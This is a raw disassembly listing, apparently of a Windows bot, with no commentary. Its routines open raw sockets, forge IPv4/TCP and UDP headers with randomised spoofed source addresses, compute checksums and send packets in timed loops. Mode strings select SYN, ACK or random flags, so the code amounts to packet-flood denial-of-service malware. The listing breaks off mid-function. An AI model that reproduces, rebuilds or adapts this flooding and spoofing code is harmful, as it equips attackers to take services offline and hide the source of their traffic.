var_6 = word ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 440h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 68h
mov esi, eax
pop ecx
lea edi, [ebp+var_240]
rep movsd
push 1
xor ebx, ebx
pop esi
lea edi, [ebp+var_9F]
push 0Eh
mov [eax+19Ch], esi
pop ecx
xor eax, eax
mov [ebp+var_A0], bl
rep stosd
stosw
stosb
mov edi, ds:dword_4F63B0
call edi ; GetTickCount
push eax ; Seed
call _srand
pop ecx
push 0FFh
push 3
push 2
call dword_4E42A0 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_4149B7
call dword_4E41B4 ; WSAGetLastError
push eax
lea eax, [ebp+Dest]
push offset asc_44DEA0 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_A8], ebx
jnz short loc_414997
push ebx ; int
lea eax, [ebp+Dest]
push [ebp+var_AC] ; int
push eax ; int
lea eax, [ebp+var_13C]
push eax ; Str
push [ebp+var_240] ; int
call sub_409D6C
add esp, 14h
loc_414997: ; CODE XREF: sub_4148EE+84�j
lea eax, [ebp+Dest]
push eax
call sub_415C77
push [ebp+var_BC]
call sub_40BAAA
pop ecx
pop ecx
push ebx
call ds:dword_4F63D4 ; ExitThread
loc_4149B7: ; CODE XREF: sub_4148EE+61�j
lea ecx, [ebp+var_34]
push 4
push ecx
push 2
push ebx
push eax
mov [ebp+var_34], esi
call dword_4E4200 ; setsockopt
cmp eax, 0FFFFFFFFh
jnz short loc_414A35
call dword_4E41B4 ; WSAGetLastError
push eax
lea eax, [ebp+Dest]
push offset asc_44DED4 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_A8], ebx
jnz short loc_414A15
push ebx ; int
lea eax, [ebp+Dest]
push [ebp+var_AC] ; int
push eax ; int
lea eax, [ebp+var_13C]
push eax ; Str
push [ebp+var_240] ; int
call sub_409D6C
add esp, 14h
loc_414A15: ; CODE XREF: sub_4148EE+102�j
lea eax, [ebp+Dest]
push eax
call sub_415C77
push [ebp+var_BC]
call sub_40BAAA
pop ecx
pop ecx
push ebx
call ds:dword_4F63D4 ; ExitThread
loc_414A35: ; CODE XREF: sub_4148EE+DF�j
lea eax, [ebp+var_23C]
push eax
call dword_4E4260 ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short loc_414AA5
lea eax, [ebp+Dest]
push offset asc_44DF0C ; "-"
push eax ; Dest
call _sprintf
cmp [ebp+var_A8], ebx
pop ecx
pop ecx
jnz short loc_414A85
push ebx ; int
lea eax, [ebp+Dest]
push [ebp+var_AC] ; int
push eax ; int
lea eax, [ebp+var_13C]
push eax ; Str
push [ebp+var_240] ; int
call sub_409D6C
add esp, 14h
loc_414A85: ; CODE XREF: sub_4148EE+172�j
lea eax, [ebp+Dest]
push eax
call sub_415C77
push [ebp+var_BC]
call sub_40BAAA
pop ecx
pop ecx
push ebx
call ds:dword_4F63D4 ; ExitThread
loc_414AA5: ; CODE XREF: sub_4148EE+157�j
push 10h ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push ebx
call dword_4E4220 ; htons
mov [ebp+var_42], ax
lea eax, [ebp+var_23C]
push eax
call dword_4E4260 ; inet_addr
mov [ebp+var_40], eax
mov [ebp+arg_0], ebx
call edi ; GetTickCount
mov [ebp+var_30], eax
loc_414ADD: ; CODE XREF: sub_4148EE+430�j
call edi ; GetTickCount
sub eax, [ebp+var_30]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+var_B4]
ja loc_414DA1
push 28h
mov [ebp+var_2C], 45h
call dword_4E4220 ; htons
cmp [ebp+var_B0], ebx
mov [ebp+var_2A], ax
mov [ebp+var_28], si
mov [ebp+var_26], bx
mov [ebp+var_24], 80h
mov [ebp+var_23], 6
mov [ebp+var_22], bx
jz short loc_414B50
call _rand
mov esi, eax
shl esi, 8
call _rand
add esi, eax
shl esi, 8
call _rand
add esi, eax
shl esi, 8
call _rand
add esi, eax
push 1
mov [ebp+var_20], esi
pop esi
jmp short loc_414B66
; ---------------------------------------------------------------------------
loc_414B50: ; CODE XREF: sub_4148EE+233�j
push [ebp+var_240]
call sub_40AFA9
pop ecx
push eax
call dword_4E4260 ; inet_addr
mov [ebp+var_20], eax
loc_414B66: ; CODE XREF: sub_4148EE+260�j
mov eax, [ebp+var_40]
cmp [ebp+var_B8], ebx
mov [ebp+var_1C], eax
jnz short loc_414B84
call _rand
cdq
mov ecx, 401h
idiv ecx
push edx
jmp short loc_414B8A
; ---------------------------------------------------------------------------
loc_414B84: ; CODE XREF: sub_4148EE+284�j
push [ebp+var_B8]
loc_414B8A: ; CODE XREF: sub_4148EE+294�j
call dword_4E4220 ; htons
mov [ebp+var_16], ax
call _rand
cdq
mov ecx, 401h
idiv ecx
push edx
call dword_4E4220 ; htons
push 12345678h
mov [ebp+var_18], ax
call dword_4E421C ; htonl
mov [ebp+var_14], eax
lea eax, [ebp+Str]
push offset aSyn_1 ; "syn"
push eax ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_414BDA
mov [ebp+var_10], ebx
mov [ebp+var_B], 2
jmp short loc_414C36
; ---------------------------------------------------------------------------
loc_414BDA: ; CODE XREF: sub_4148EE+2E1�j
lea eax, [ebp+Str]
push offset aAck_0 ; "ack"
push eax ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_414BFA
mov [ebp+var_10], ebx
mov [ebp+var_B], 10h
jmp short loc_414C36
; ---------------------------------------------------------------------------
loc_414BFA: ; CODE XREF: sub_4148EE+301�j
lea eax, [ebp+Str]
push offset aRandom_2 ; "random"
push eax ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_414C36
call _rand
push 3
cdq
pop ecx
idiv ecx
mov [ebp+var_10], edx
call _rand
push 2
cdq
pop ecx
idiv ecx
neg edx
sbb dl, dl
and dl, 0Eh
add dl, cl
mov [ebp+var_B], dl
loc_414C36: ; CODE XREF: sub_4148EE+2EA�j
; sub_4148EE+30A�j ...
push 200h
mov [ebp+var_C], 50h
call dword_4E4220 ; htons
mov [ebp+var_A], ax
mov eax, [ebp+var_20]
mov [ebp+Src], eax
mov eax, [ebp+var_1C]
push 14h
mov [ebp+var_6], bx
mov [ebp+var_8], bx
mov [ebp+var_60], eax
mov [ebp+var_5C], bl
mov [ebp+var_5B], 6
call dword_4E4220 ; htons
mov [ebp+var_5A], ax
lea eax, [ebp+Src]
push 20h ; Size
push eax ; Src
lea eax, [ebp+var_A0]
push eax ; Dst
call _memcpy
lea eax, [ebp+var_18]
push 14h ; Size
push eax ; Src
lea eax, [ebp+var_80]
push eax ; Dst
call _memcpy
lea eax, [ebp+var_A0]
push 34h
push eax
call sub_40B002
mov [ebp+var_8], ax
lea eax, [ebp+var_2C]
push 14h ; Size
push eax ; Src
lea eax, [ebp+var_A0]
push eax ; Dst
call _memcpy
lea eax, [ebp+var_18]
push 14h ; Size
push eax ; Src
lea eax, [ebp+var_8C]
push eax ; Dst
call _memcpy
push 4 ; Size
lea eax, [ebp+var_78]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 44h
lea eax, [ebp+var_A0]
push 28h
push eax
call sub_40B002
mov [ebp+var_22], ax
lea eax, [ebp+var_2C]
push 14h ; Size
push eax ; Src
lea eax, [ebp+var_A0]
push eax ; Dst
call _memcpy
add esp, 14h
lea eax, [ebp+Dst]
push 10h
push eax
push ebx
lea eax, [ebp+var_A0]
push 3Ch
push eax
push [ebp+var_4]
call dword_4E4284 ; sendto
cmp eax, 0FFFFFFFFh
jz short loc_414D23
inc [ebp+arg_0]
jmp loc_414ADD
; ---------------------------------------------------------------------------
loc_414D23: ; CODE XREF: sub_4148EE+42B�j
push [ebp+var_4]
call dword_4E42B8 ; closesocket
call dword_4E41B4 ; WSAGetLastError
push eax
lea eax, [ebp+var_23C]
push [ebp+arg_0]
push eax
push offset asc_44DF3C ; "-"
lea eax, [ebp+Dest]
push 200h ; Count
push eax ; Dest
call __snprintf
add esp, 18h
cmp [ebp+var_A8], ebx
jnz short loc_414D81
push ebx ; int
lea eax, [ebp+Dest]
push [ebp+var_AC] ; int
push eax ; int
lea eax, [ebp+var_13C]
push eax ; Str
push [ebp+var_240] ; int
call sub_409D6C
add esp, 14h
loc_414D81: ; CODE XREF: sub_4148EE+46E�j
lea eax, [ebp+Dest]
push eax
call sub_415C77
push [ebp+var_BC]
call sub_40BAAA
pop ecx
pop ecx
push ebx
call ds:dword_4F63D4 ; ExitThread
loc_414DA1: ; CODE XREF: sub_4148EE+203�j
push [ebp+var_4]
call dword_4E42B8 ; closesocket
mov eax, [ebp+arg_0]
xor edx, edx
imul eax, 3Ch
mov ecx, eax
shr eax, 0Ah
div [ebp+var_B4]
shr ecx, 14h
push ecx
push eax
lea eax, [ebp+var_23C]
push [ebp+arg_0]
push eax
lea eax, [ebp+Str]
push eax
lea eax, [ebp+Dest]
push offset asc_44DF8C ; "-"
push eax ; Dest
call _sprintf
add esp, 1Ch
cmp [ebp+var_A8], ebx
jnz short loc_414E12
push ebx ; int
lea eax, [ebp+Dest]
push [ebp+var_AC] ; int
push eax ; int
lea eax, [ebp+var_13C]
push eax ; Str
push [ebp+var_240] ; int
call sub_409D6C
add esp, 14h
loc_414E12: ; CODE XREF: sub_4148EE+4FF�j
lea eax, [ebp+Dest]
push eax
call sub_415C77
push [ebp+var_BC]
call sub_40BAAA
pop ecx
pop ecx
push ebx
call ds:dword_4F63D4 ; ExitThread
sub_4148EE endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414E32 proc near ; CODE XREF: sub_414F3C+19A�p
; sub_414F3C+1A9�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
mov edx, [ebp+arg_0]
push esi
xor esi, esi
cmp eax, 1
mov [ebp+arg_4], esi
jle short loc_414E5E
mov ecx, eax
push edi
shr ecx, 1
lea edi, [ecx+ecx]
sub eax, edi
loc_414E50: ; CODE XREF: sub_414E32+26�j
movzx edi, word ptr [edx]
add esi, edi
inc edx
inc edx
dec ecx
jnz short loc_414E50
pop edi
cmp eax, 1
loc_414E5E: ; CODE XREF: sub_414E32+12�j
jnz short loc_414E6B
mov al, [edx]
mov byte ptr [ebp+arg_4], al
movzx eax, word ptr [ebp+arg_4]
add esi, eax
loc_414E6B: ; CODE XREF: sub_414E32:loc_414E5E�j
mov ecx, esi
and esi, 0FFFFh
sar ecx, 10h
add ecx, esi
pop esi
mov eax, ecx
sar eax, 10h
add eax, ecx
not eax
pop ebp
retn
sub_414E32 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414E84 proc near ; DATA XREF: sub_401CC7+6E98�o
Dest = byte ptr -394h
var_194 = dword ptr -194h
var_190 = byte ptr -190h
Str = byte ptr -110h
var_90 = byte ptr -90h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 394h
mov eax, [ebp+arg_0]
push esi
push edi
push 65h
pop ecx
mov esi, eax
lea edi, [ebp+var_194]
rep movsd
mov dword ptr [eax+190h], 1
lea eax, [ebp+Str]
push eax ; Str
call _atoi
pop ecx
push eax
lea eax, [ebp+var_190]
push eax
call dword_4E4260 ; inet_addr
push eax
lea esi, [ebp+var_194]
sub esp, 194h
push 65h
pop ecx
mov edi, esp
rep movsd
call sub_414F3C
add esp, 19Ch
push eax
lea eax, [ebp+Dest]
push offset asc_44DFDC ; "-"
push eax ; Dest
call _sprintf
xor esi, esi
add esp, 0Ch
cmp [ebp+var_8], esi
jnz short loc_414F1F
push esi ; int
lea eax, [ebp+Dest]
push [ebp+var_C] ; int
push eax ; int
lea eax, [ebp+var_90]
push eax ; Str
push [ebp+var_194] ; int
call sub_409D6C
add esp, 14h
loc_414F1F: ; CODE XREF: sub_414E84+79�j
lea eax, [ebp+Dest]
push eax
call sub_415C77
push [ebp+var_10]
call sub_40BAAA
pop ecx
pop ecx
push esi
call ds:dword_4F63D4 ; ExitThread
sub_414E84 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414F3C proc near ; CODE XREF: sub_414E84+54�p
Dest = byte ptr -0CCh
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
var_A4 = byte ptr -0A4h
var_A3 = byte ptr -0A3h
var_A2 = word ptr -0A2h
Src = byte ptr -0A0h
var_8C = byte ptr -8Ch
var_78 = word ptr -78h
var_76 = word ptr -76h
var_74 = dword ptr -74h
var_68 = byte ptr -68h
var_64 = byte ptr -64h
var_63 = byte ptr -63h
var_62 = byte ptr -62h
var_58 = dword ptr -58h
var_54 = byte ptr -54h
var_52 = word ptr -52h
var_50 = word ptr -50h
var_4E = word ptr -4Eh
var_4C = byte ptr -4Ch
var_4B = byte ptr -4Bh
var_4A = word ptr -4Ah
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = word ptr -40h
var_3E = word ptr -3Eh
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = word ptr -30h
var_2E = word ptr -2Eh
var_2C = word ptr -2Ch
Dst = byte ptr -28h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_194 = dword ptr 19Ch
arg_198 = dword ptr 1A0h
push ebp
mov ebp, esp
sub esp, 0CCh
push ebx
push esi
mov esi, ds:dword_4F63B0
xor ebx, ebx
push edi
mov [ebp+var_4], ebx
call esi ; GetTickCount
push 0FFh
push 3
push 2
mov [ebp+var_10], eax
call dword_4E42A0 ; socket
mov [ebp+var_8], eax
call esi ; GetTickCount
push eax ; Seed
call _srand
pop ecx
mov edi, 578h
push edi ; Size
push 9
push 1
call sub_419589
pop ecx
pop ecx
push eax ; Val
lea eax, [ebp+Dst]
push eax ; Dst
call _memset
add esp, 0Ch
mov esi, 5A0h
loc_414F96: ; CODE XREF: sub_414F3C+235�j
call ds:dword_4F63B0 ; GetTickCount
sub eax, [ebp+var_10]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+arg_198]
ja loc_415176
cmp dword_4E7A18, ebx
jnz short loc_415015
push 10h
pop eax
mov [ebp+var_14], eax
push eax ; Size
lea eax, [ebp+var_68]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_68]
push eax
push [ebp+arg_0]
call dword_4E41C4 ; getsockname
push 0FFh
push 1
call sub_419589
pop ecx
pop ecx
push eax
movzx eax, [ebp+var_62]
push eax
movzx eax, [ebp+var_63]
push eax
movzx eax, [ebp+var_64]
push eax
lea eax, [ebp+Dest]
push offset aD_D_D_D_1 ; "%d.%d.%d.%d"
push eax ; Dest
call _sprintf
add esp, 18h
jmp short loc_415028
; ---------------------------------------------------------------------------
loc_415015: ; CODE XREF: sub_414F3C+7E�j
lea eax, [ebp+Dest]
push offset byte_4E73F8 ; Source
push eax ; Dest
call _strcpy
pop ecx
pop ecx
loc_415028: ; CODE XREF: sub_414F3C+D7�j
lea eax, [ebp+Dest]
push eax
call dword_4E4260 ; inet_addr
mov [ebp+var_C], eax
mov eax, [ebp+var_58]
and al, 45h
push esi
or al, 45h
mov [ebp+var_54], 10h
mov [ebp+var_58], eax
call dword_4E4220 ; htons
mov [ebp+var_52], ax
call _rand
mov [ebp+var_50], ax
mov eax, [ebp+var_C]
mov [ebp+var_48], eax
mov eax, [ebp+arg_194]
mov [ebp+var_4E], 40h
mov [ebp+var_4C], 40h
mov [ebp+var_4B], 6
mov [ebp+var_4A], bx
mov [ebp+var_44], eax
call _rand
mov [ebp+var_40], ax
call _rand
mov [ebp+var_3E], ax
call _rand
mov [ebp+var_3C], eax
call _rand
mov [ebp+var_38], eax
mov eax, [ebp+var_34]
and ax, 0FF50h
push 14h
or al, 50h
mov byte ptr [ebp+var_34+2], 18h
mov word ptr [ebp+var_34], ax
mov ax, [ebp+var_3E]
mov [ebp+var_76], ax
mov eax, [ebp+var_44]
mov [ebp+var_74], eax
lea eax, [ebp+var_58]
push eax
mov [ebp+var_30], 787Dh
mov [ebp+var_2E], bx
mov [ebp+var_2C], bx
mov [ebp+var_78], 2
call sub_414E32
mov [ebp+var_4A], ax
lea eax, [ebp+var_58]
push 28h
push eax
call sub_414E32
mov eax, [ebp+var_48]
add esp, 10h
mov [ebp+var_AC], eax
mov eax, [ebp+var_44]
push 58Ch
mov [ebp+var_A8], eax
mov [ebp+var_A4], bl
mov [ebp+var_A3], 6
call ds:dword_4F6560 ; htons
mov [ebp+var_A2], ax
lea eax, [ebp+Src]
push 14h ; Size
push eax ; Src
lea eax, [ebp+var_40]
push eax ; Dst
call _memcpy
lea eax, [ebp+var_8C]
push edi ; Size
push eax ; Src
lea eax, [ebp+Dst]
push eax ; Dst
call _memcpy
lea eax, [ebp+var_AC]
push 598h
push eax
call sub_414E32
add esp, 20h
mov [ebp+var_2E], ax
push 10h
lea eax, [ebp+var_78]
push eax
push ebx
lea eax, [ebp+var_58]
push esi
push eax
push [ebp+var_8]
call dword_4E4284 ; sendto
inc [ebp+var_4]
jmp loc_414F96
; ---------------------------------------------------------------------------
loc_415176: ; CODE XREF: sub_414F3C+72�j
push [ebp+var_8]
call dword_4E42B8 ; closesocket
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_414F3C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415187 proc near ; DATA XREF: sub_401CC7+4DC7�o
Dest = byte ptr -414h
var_214 = byte ptr -214h
var_10 = dword ptr -10h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 414h
mov edx, [ebp+arg_0]
push esi
mov eax, 85h
push edi
mov ecx, eax
mov esi, edx
lea edi, [ebp+var_214]
sub esp, 214h
rep movsd
mov ecx, eax
lea esi, [ebp+var_214]
mov edi, esp
mov dword ptr [edx+210h], 1
rep movsd
call sub_4151FE
add esp, 214h
push eax
lea eax, [ebp+Dest]
push offset asc_44E01C ; "-"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dest]
push eax
call sub_415C77
push [ebp+var_10]
call sub_40BAAA
add esp, 14h
push 0
call ds:dword_4F63D4 ; ExitThread
sub_415187 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4151FE(int,char,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,char,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,char Str,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,char,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int)
sub_4151FE proc near ; CODE XREF: sub_415187+3B�p
Dest = byte ptr -254h
var_54 = byte ptr -54h
Dst = byte ptr -34h
var_30 = byte ptr -30h
var_2F = byte ptr -2Fh
var_2E = byte ptr -2Eh
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_84 = byte ptr 8Ch
Str = byte ptr 10Ch
arg_184 = byte ptr 18Ch
arg_208 = dword ptr 210h
arg_20C = dword ptr 214h
push ebp
mov ebp, esp
sub esp, 254h
push ebx
push esi
mov ebx, 0FFh
push edi
push ebx
push 3
push 2
call dword_4E42A0 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_C], eax
jnz short loc_41523C
lea eax, [ebp+Dest]
push offset asc_44E05C ; "-"
push eax ; Dest
call _sprintf
pop ecx
xor edi, edi
pop ecx
jmp loc_415505
; ---------------------------------------------------------------------------
loc_41523C: ; CODE XREF: sub_4151FE+22�j
lea ecx, [ebp+var_14]
push 4
push ecx
xor edi, edi
push 2
push edi
push eax
mov [ebp+var_14], 1
call dword_4E4200 ; setsockopt
cmp eax, 0FFFFFFFFh
jnz short loc_415268
call dword_4E41B4 ; WSAGetLastError
push eax
push offset unk_44E088
jmp short loc_415283
; ---------------------------------------------------------------------------
loc_415268: ; CODE XREF: sub_4151FE+5A�j
lea eax, [ebp+arg_4]
push eax
call dword_4E4260 ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short loc_415297
call dword_4E41B4 ; WSAGetLastError
push eax
push offset asc_44E0D8 ; "-"
loc_415283: ; CODE XREF: sub_4151FE+68�j
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
add esp, 0Ch
jmp loc_415505
; ---------------------------------------------------------------------------
loc_415297: ; CODE XREF: sub_4151FE+77�j
push edi
mov [ebp+var_24], 2
call dword_4E4220 ; htons
mov [ebp+var_22], ax
lea eax, [ebp+arg_4]
push eax
call ds:dword_4F655C ; inet_addr
mov esi, ds:dword_4F63B0
mov [ebp+var_20], eax
call esi ; GetTickCount
mov [ebp+var_8], eax
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+Dest]
push offset asc_44E11C ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+arg_20C], edi
jnz short loc_415300
push edi ; int
lea eax, [ebp+Dest]
push [ebp+arg_208] ; int
push eax ; int
lea eax, [ebp+arg_184]
push eax ; Str
push [ebp+arg_0] ; int
call sub_409D6C
add esp, 14h
loc_415300: ; CODE XREF: sub_4151FE+E0�j
mov [ebp+var_4], edi
call esi ; GetTickCount
sub eax, [ebp+var_8]
xor edx, edx
mov ecx, 3E8h
div ecx
mov esi, eax
lea eax, [ebp+Str]
push eax ; Str
call _atoi
cmp esi, eax
pop ecx
ja loc_4154BB
mov esi, 41Ch
jmp short loc_415334
; ---------------------------------------------------------------------------
loc_41532F: ; CODE XREF: sub_4151FE+2B7�j
mov ebx, 0FFh
loc_415334: ; CODE XREF: sub_4151FE+12F�j
cmp dword_4E7A18, edi
jnz short loc_41538E
push 10h
pop eax
mov [ebp+var_10], eax
push eax ; Size
lea eax, [ebp+Dst]
push edi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+Dst]
push eax
push [ebp+arg_0]
call dword_4E41C4 ; getsockname
push ebx
push 1
call sub_419589
pop ecx
pop ecx
push eax
movzx eax, [ebp+var_2E]
push eax
movzx eax, [ebp+var_2F]
push eax
movzx eax, [ebp+var_30]
push eax
lea eax, [ebp+var_54]
push offset aD_D_D_D_2 ; "%d.%d.%d.%d"
push eax ; Dest
call _sprintf
add esp, 18h
jmp short loc_41539E
; ---------------------------------------------------------------------------
loc_41538E: ; CODE XREF: sub_4151FE+13C�j
lea eax, [ebp+var_54]
push offset byte_4E73F8 ; Source
push eax ; Dest
call _strcpy
pop ecx
pop ecx
loc_41539E: ; CODE XREF: sub_4151FE+18E�j
push esi
mov byte_4E75F8, 45h
call dword_4E4220 ; htons
mov word_4E75FA, ax
lea eax, [ebp+var_54]
push eax
mov word_4E75FC, 1
mov word_4E75FE, di
mov byte_4E7600, 80h
mov byte_4E7601, 11h
mov word_4E7602, di
call dword_4E4260 ; inet_addr
mov dword_4E7604, eax
mov eax, [ebp+var_20]
mov dword_4E7608, eax
lea eax, [ebp+arg_84]
push eax ; Str
mov word_4E7612, di
call _atoi
test eax, eax
pop ecx
jnz short loc_415416
call _rand
cdq
mov ecx, 401h
idiv ecx
push edx
jmp short loc_415424
; ---------------------------------------------------------------------------
loc_415416: ; CODE XREF: sub_4151FE+206�j
lea eax, [ebp+arg_84]
push eax ; Str
call _atoi
pop ecx
push eax
loc_415424: ; CODE XREF: sub_4151FE+216�j
call dword_4E4220 ; htons
mov word_4E760E, ax
call _rand
cdq
mov ecx, 401h
push 408h
idiv ecx
mov word_4E760C, dx
call dword_4E4220 ; htons
push 400h ; Size
mov word_4E7610, ax
call _rand
cdq
idiv ebx
push edx ; Val
push offset dword_4E7614 ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+var_24]
push 10h
push eax
push edi
push esi
push offset byte_4E75F8
push [ebp+var_C]
call dword_4E4284 ; sendto
cmp eax, 0FFFFFFFFh
jz loc_415534
inc [ebp+var_4]
call ds:dword_4F63B0 ; GetTickCount
sub eax, [ebp+var_8]
xor edx, edx
mov ecx, 3E8h
div ecx
mov ebx, eax
lea eax, [ebp+Str]
push eax ; Str
call _atoi
cmp ebx, eax
pop ecx
jbe loc_41532F
loc_4154BB: ; CODE XREF: sub_4151FE+124�j
push [ebp+var_C]
call dword_4E42B8 ; closesocket
mov esi, [ebp+var_4]
lea eax, [ebp+Str]
push eax ; Str
imul esi, 41Ch
call _atoi
pop ecx
xor edx, edx
mov ecx, eax
mov eax, esi
shr eax, 0Ah
div ecx
shr esi, 14h
push eax
push esi
push [ebp+var_4]
lea eax, [ebp+arg_4]
push eax
push offset asc_44E1E0 ; "-"
loc_4154F6: ; CODE XREF: sub_4151FE+34A�j
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
add esp, 18h
loc_415505: ; CODE XREF: sub_4151FE+39�j
; sub_4151FE+94�j
cmp [ebp+arg_20C], edi
jnz short loc_41552D
push edi ; int
lea eax, [ebp+Dest]
push [ebp+arg_208] ; int
push eax ; int
lea eax, [ebp+arg_184]
push eax ; Str
push [ebp+arg_0] ; int
call sub_409D6C
add esp, 14h
loc_41552D: ; CODE XREF: sub_4151FE+30D�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_415534: ; CODE XREF: sub_4151FE+28B�j
push [ebp+var_4]
push esi
call dword_4E41B4 ; WSAGetLastError
push eax
lea eax, [ebp+arg_4]
push eax
push offset unk_44E154
jmp short loc_4154F6
sub_4151FE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41554A proc near ; DATA XREF: sub_401CC7+64B3�o
Dest = byte ptr -414h
var_214 = dword ptr -214h
var_210 = byte ptr -210h
var_190 = byte ptr -190h
Str = byte ptr -110h
var_90 = byte ptr -90h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 414h
mov eax, [ebp+arg_0]
push esi
push edi
mov ecx, 85h
mov esi, eax
lea edi, [ebp+var_214]
rep movsd
mov dword ptr [eax+210h], 1
lea eax, [ebp+Str]
push eax ; Str
call _atoi
pop ecx
push eax
lea eax, [ebp+var_190]
push eax ; Str
call _atoi
pop ecx
push eax
lea eax, [ebp+var_210]
push eax
call dword_4E4260 ; inet_addr
push eax
call sub_4156E7
add esp, 0Ch
push eax
lea eax, [ebp+Dest]
push offset asc_44E244 ; "-"
push eax ; Dest
call _sprintf
xor esi, esi
add esp, 0Ch
cmp [ebp+var_8], esi
jnz short loc_4155DF
push esi ; int
lea eax, [ebp+Dest]
push [ebp+var_C] ; int
push eax ; int
lea eax, [ebp+var_90]
push eax ; Str
push [ebp+var_214] ; int
call sub_409D6C
add esp, 14h
loc_4155DF: ; CODE XREF: sub_41554A+73�j
lea eax, [ebp+Dest]
push eax
call sub_415C77
push [ebp+var_10]
call sub_40BAAA
pop ecx
pop ecx
push esi
call ds:dword_4F63D4 ; ExitThread
pop edi
pop esi
sub_41554A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4155FE proc near ; CODE XREF: sub_4156E7+191�p
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 210h
and [ebp+var_4], 0
cmp [ebp+arg_C], 0
push esi
push edi
jnz short loc_415627
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4F6564 ; connect
jmp loc_4156E3
; ---------------------------------------------------------------------------
loc_415627: ; CODE XREF: sub_4155FE+13�j
mov esi, [ebp+arg_0]
push 1
pop edi
lea eax, [ebp+var_8]
push eax
push 8004667Eh
push esi
mov [ebp+var_8], edi
call ds:dword_4F6548 ; ioctlsocket
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call dword_4E41C8 ; connect
push [ebp+arg_C]
lea eax, [ebp+var_210]
mov [ebp+var_108], esi
mov [ebp+var_10C], edi
push 0
push eax
lea eax, [ebp+var_10C]
mov [ebp+var_20C], esi
push eax
lea eax, [esi+1]
push eax
mov [ebp+var_210], edi
call dword_4E4208 ; select
test eax, eax
jnz short loc_41568B
or eax, 0FFFFFFFFh
jmp short loc_4156E3
; ---------------------------------------------------------------------------
loc_41568B: ; CODE XREF: sub_4155FE+86�j
or edi, 0FFFFFFFFh
cmp eax, edi
jnz short loc_415696
loc_415692: ; CODE XREF: sub_4155FE+B8�j
; sub_4155FE+DC�j
mov eax, edi
jmp short loc_4156E3
; ---------------------------------------------------------------------------
loc_415696: ; CODE XREF: sub_4155FE+92�j
lea eax, [ebp+var_10C]
push eax
push esi
call sub_43B892 ; __WSAFDIsSet
test eax, eax
jnz short loc_4156B8
lea eax, [ebp+var_210]
push eax
push esi
call sub_43B892 ; __WSAFDIsSet
test eax, eax
